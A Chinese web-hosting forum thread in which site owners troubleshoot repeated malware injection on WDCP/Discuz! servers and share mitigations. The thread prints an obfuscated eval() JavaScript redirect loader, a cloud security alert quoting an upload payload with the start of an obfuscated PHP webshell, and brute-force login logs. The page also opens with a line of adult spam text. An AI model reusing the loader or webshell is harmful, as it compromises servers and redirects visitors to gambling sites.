四虎影视在线影院在线观看,小s货再浪些再咬紧点h,国产精品水嫩水嫩,97精产国品一二三产区

Board logo

標(biāo)題: [求助] 最近網(wǎng)站一直被掛馬, 會(huì)不會(huì)是WDCP環(huán)境出什么安全問(wèn)題了? [打印本頁(yè)]
作者: doufenger    時(shí)間: 2018-8-19 11:37     標(biāo)題: 最近網(wǎng)站一直被掛馬, 會(huì)不會(huì)是WDCP環(huán)境出什么安全問(wèn)題了?

最近網(wǎng)站一直被掛馬,從百度搜進(jìn)來(lái)的都會(huì)跳轉(zhuǎn)到一個(gè)博彩網(wǎng)頁(yè),會(huì)不會(huì)是WDCP環(huán)境出什么安全問(wèn)題了?
我在A服務(wù)器被掛后換到B服務(wù)器(隱藏好IP了的)還是被跟上掛馬。服務(wù)器里只有一個(gè)Discuz! X3.4,其他都是靜態(tài)頁(yè)了。
被掛的代碼大概是這樣的
  1. <meta name="keywords" content="澳門威尼斯在線平臺(tái),威尼斯網(wǎng)上娛樂(lè)平臺(tái),威尼斯平臺(tái)官網(wǎng),威尼斯游戲平臺(tái),威尼斯 "/>
  2. <meta name="description" content="【wnsr484.com】威尼斯人官方網(wǎng)可以讓國(guó)內(nèi)的很多游戲玩家都開始喜好上這種娛樂(lè)游戲體驗(yàn)方式。這是人們擁有完美業(yè)余生活的有效途徑。這對(duì)改善生活質(zhì)量的作用非常的重要。"/>
  3. <script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="XX"}</script>
  4. <script type="text/javascript">
  5. eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('o["\\e\\c\\1\\n\\f\\8\\m\\0"]["\\7\\3\\9\\0\\8"](\'\\g\\2\\1\\3\\9\\4\\0 \\0\\k\\4\\8\\d\\6\\0\\8\\l\\0\\5\\h\\a\\j\\a\\2\\1\\3\\9\\4\\0\\6 \\2\\3\\1\\d\\6\\s\\0\\0\\4\\2\\t\\5\\5\\7\\7\\7\\b\\u\\1\\e\\a\\2\\r\\b\\1\\c\\f\\5\\j\\q\\p\\b\\h\\2\\6\\i\\g\\5\\2\\1\\3\\9\\4\\0\\i\');',31,31,'x74|x63|x73|x72|x70|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6d|x3c|x6a|x3e|x76|x79|x78|x6e|x75|window|x31|x36|x38|x68|x3a|x62'.split('|'),0,{}))</script>
復(fù)制代碼
作者: lyk082401    時(shí)間: 2018-8-21 02:29

  1. 104         admin         qq1*****         119.166.54.71         2018-08-21 01:49:37         密碼錯(cuò)誤
  2. 103         admin         110*****         119.166.54.71         2018-08-21 01:49:37         密碼錯(cuò)誤
  3. 102         admin         112*****         119.166.54.71         2018-08-21 01:49:37         密碼錯(cuò)誤
  4. 101         admin         147*****         119.166.54.71         2018-08-21 01:49:37         密碼錯(cuò)誤
  5. 100         admin         753*****         119.166.54.71         2018-08-21 01:49:37         密碼錯(cuò)誤
  6. 99         admin         584*****         119.166.54.71         2018-08-21 01:49:37         密碼錯(cuò)誤
  7. 98         admin         asd*****         119.166.54.71         2018-08-21 01:49:37         密碼錯(cuò)誤
  8. 97         admin         1A2*****         119.166.54.71         2018-08-21 01:49:37         密碼錯(cuò)誤
  9. 96         admin         159*****         119.166.54.71         2018-08-21 01:49:37         密碼錯(cuò)誤
  10. 95         admin         wan*****         119.166.54.71         2018-08-21 01:49:36         密碼錯(cuò)誤
  11. 94         admin         zxc*****         119.166.54.71         2018-08-21 01:49:36         密碼錯(cuò)誤
  12. 93         admin         cao*****         119.166.54.71         2018-08-21 01:49:36         密碼錯(cuò)誤
  13. 92         admin         nih*****         119.166.54.71         2018-08-21 01:49:36         密碼錯(cuò)誤
  14. 91         admin         s12*****         119.166.54.71         2018-08-21 01:49:36         密碼錯(cuò)誤
  15. 90         admin         584*****         119.166.54.71         2018-08-21 01:49:36         密碼錯(cuò)誤
  16. 89         admin         12q*****         119.166.54.71         2018-08-21 01:49:36         密碼錯(cuò)誤
  17. 88         admin         111*****         119.166.54.71         2018-08-21 01:49:36         密碼錯(cuò)誤
  18. 87         admin         123*****         119.166.54.71         2018-08-21 01:49:36         密碼錯(cuò)誤
  19. 86         admin         a12*****         119.166.54.71         2018-08-21 01:49:36         密碼錯(cuò)誤

  21.     只顯示最近30條記錄
復(fù)制代碼
現(xiàn)在一安裝好模板就會(huì)有自動(dòng)程序破解登錄密碼
你可以去系統(tǒng)設(shè)置 登錄日志 看看有沒(méi)有
作者: lyk082401    時(shí)間: 2018-8-21 02:30

我記得幾個(gè)月前安裝的沒(méi)有這種情況。
作者: lyk082401    時(shí)間: 2018-8-21 02:34

建議去系統(tǒng)設(shè)置里面開啟三次登錄限制鎖定半小時(shí)
作者: lediy    時(shí)間: 2018-9-14 19:29

我的也是,多站點(diǎn)都被掛馬,懷疑服務(wù)器問(wèn)題
作者: 初七丶    時(shí)間: 2018-10-23 13:54

和樓主一毛一樣的問(wèn)題,同求
作者: akme8    時(shí)間: 2018-10-26 09:34

本帖最后由 akme8 于 2018-10-26 09:42 編輯

我之前也遇到了這個(gè)問(wèn)題,我最近修補(bǔ)了網(wǎng)站的補(bǔ)丁,改了后臺(tái)地址,刪掉一些不常用的管理員賬號(hào),在ftp上刪掉那些不屬于你的文件,還有改了ftp端口號(hào),那些賬號(hào)密碼能改的都改掉,這一周來(lái)暫時(shí)都沒(méi)有類似的情況出現(xiàn),希望對(duì)你有幫助。
作者: steven001    時(shí)間: 2018-11-14 09:32

XXXX:8080/sys/filee?act=edit&t=f&p=/www/web/XXXXXX/public_html/upload/201612/1482310143.php

我也是經(jīng)常被掛馬
通過(guò)這個(gè)地址掛上來(lái)的。這個(gè)是wdcp的文件吧
作者: admin    時(shí)間: 2018-11-14 10:28

登錄了后臺(tái)掛馬?
有登錄后臺(tái)的權(quán)限,哪還需要掛,直接上傳就可以,要多少有多少?

如果沒(méi)登錄,用這個(gè)地址,能掛上來(lái)?
作者: steven001    時(shí)間: 2018-11-14 13:43

回復(fù) 9# admin


肯定是沒(méi)有登陸掛馬。通過(guò)這個(gè)地址掛的,是阿里的 態(tài)勢(shì)感知 提示的。并且是能夠通過(guò)這個(gè)寫入文件,以下是相關(guān)的信息。請(qǐng)盡快測(cè)試。謝謝!掛了好多馬,并且跟樓主一樣,在主頁(yè)寫入了博彩的相關(guān)信息,并進(jìn)行了加密。javascript進(jìn)行解密

疑似攻擊者IP
222.247.108.16
入侵點(diǎn)URL

XXXXXX:8080/sys/filee?act=edit&t=f&p=/www/web/XXXXXXXX/public_html/upload/201612/1482310143.php
Http Payload

------WebKitFormBoundaryYlHudQYI8qGl61Qw
Content-Disposition: form-data; name="fn"

/www/web/XXXXXXX/public_html/upload/201612/1482310143.php
------WebKitFormBoundaryYlHudQYI8qGl61Qw
Content-Disposition: form-data; name="furl"

/sys/file?p=%2fwww%2fweb%2fwww_XXXXX_com%2fpublic_html%2fupload/201612&act=list&t=d
------WebKitFormBoundaryYlHudQYI8qGl61Qw
Content-Disposition: form-data; name="contents"

<?php error_reporting(0);$sr="st"./*+/*+*/"rr"/*+/*+*/."ev";$id=$sr/*+/*+*/("ri"."d_"."si");$rn=$sr/*+/*+*/("em"."an"."er");$dn=$sr/*+/*+*/("em"."anr"."id");$od=$sr/*+/*+*/("ri"."dne"."po");$rd=$sr/*+/*+*/("ri"."dda"."er");$cd=$sr/*+/*+*/("ri"."deso"."lc");$fpc=$sr/*+/*+*/("stn"."etn"."oc_t"."up_e"."lif");$fgc=$sr/*+/*+*/("stn"."etn"."oc_t"."eg_e"."lif");$muf=$sr/*+/*+*/("eli"."f_d"."eda"."olp"."u_e"."vom");$dlform='<form method="post">FN:<input name="fn" size="20" type="text">URL:<input name="url" size="50" type="text"><input type="submit" value="ok"></form>';$ulform='<form method="post" enc
Http user_agent

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
被寫入的可疑文件路徑

/www/web/XXXXXXpublic_html/upload/201612/1482310143.php
事件說(shuō)明

云盾檢測(cè)到有疑似黑客在通過(guò)WEB漏洞或者WEBSHELL向服務(wù)器寫入WEBSHELL文件或可疑的二進(jìn)制文件,請(qǐng)及時(shí)關(guān)注。
解決方案

請(qǐng)及時(shí)排查告警中的URL對(duì)應(yīng)的磁盤文件是否存在漏洞,或者是否是WEBSHELL,并及時(shí)修復(fù)WEB漏洞及刪除已存在的WEBSHELL文件。如果該URL接口是您網(wǎng)站正常的文件上傳接口,請(qǐng)?jiān)诳刂婆_(tái)點(diǎn)擊標(biāo)記為誤報(bào)或忽略按鈕。
作者: steven001    時(shí)間: 2018-11-14 15:10

目前我做了一個(gè)服務(wù)器策略,臨時(shí)解決。所有目錄不允許寫入,upload目錄允許寫入但是不允許執(zhí)行
作者: admin    時(shí)間: 2018-11-14 21:52

沒(méi)登錄的話,這個(gè)是不可能寫得了文件的
你可以復(fù)制地址或路徑試試看
作者: steven001    時(shí)間: 2018-11-19 08:48

回復(fù) 12# admin

你好,管理員,這是阿里態(tài)勢(shì)給出的提示,肯定是沒(méi)有登陸的。密碼我修改過(guò),直接寫入的文件。
作者: steven001    時(shí)間: 2018-11-19 09:02

linux系統(tǒng)也沒(méi)有新增用戶,系統(tǒng)漏洞也清理了。
作者: admin    時(shí)間: 2018-11-19 16:34

回復(fù) 13# steven001

密碼我修改過(guò),直接寫入的文件。
這個(gè)是什么意思?


阿里態(tài)勢(shì),這個(gè)也不一定準(zhǔn)確吧?要看這個(gè)是否成功訪問(wèn)的狀態(tài)
阿里給的警報(bào),有時(shí)不太可信,在V2版本里,阿里把wdcp里的一個(gè)文件,只要這個(gè)文件存在,就危險(xiǎn),哪怕這個(gè)文件是空文件
作者: steven001    時(shí)間: 2018-11-20 14:01

回復(fù) 15# admin


wdcp的密碼我修改過(guò)。態(tài)勢(shì)里面提示了四十多條,所有的文件都是通過(guò)這個(gè)地址上傳上來(lái)的。并沒(méi)有干什么壞事,只是修改了主頁(yè)的信息,讓頁(yè)面回跳到首頁(yè)的時(shí)候跳到垃圾頁(yè)面。所有上傳的木馬全部經(jīng)過(guò)的加密處理。感覺(jué)這個(gè)是機(jī)器掃描直接植入的,而不是人工操作的。
作者: steven001    時(shí)間: 2018-11-20 14:02

我現(xiàn)在已經(jīng)吧wdcp修改了端口,也不知道什么原因,無(wú)法訪問(wèn)了,木馬文件我根據(jù)阿里的提示已經(jīng)刪除,先看一段時(shí)間,看是否還能上傳木馬文件。



歡迎光臨 WDlinux官方論壇 (http://cd-genova.com/bbs/) Powered by Discuz! 7.2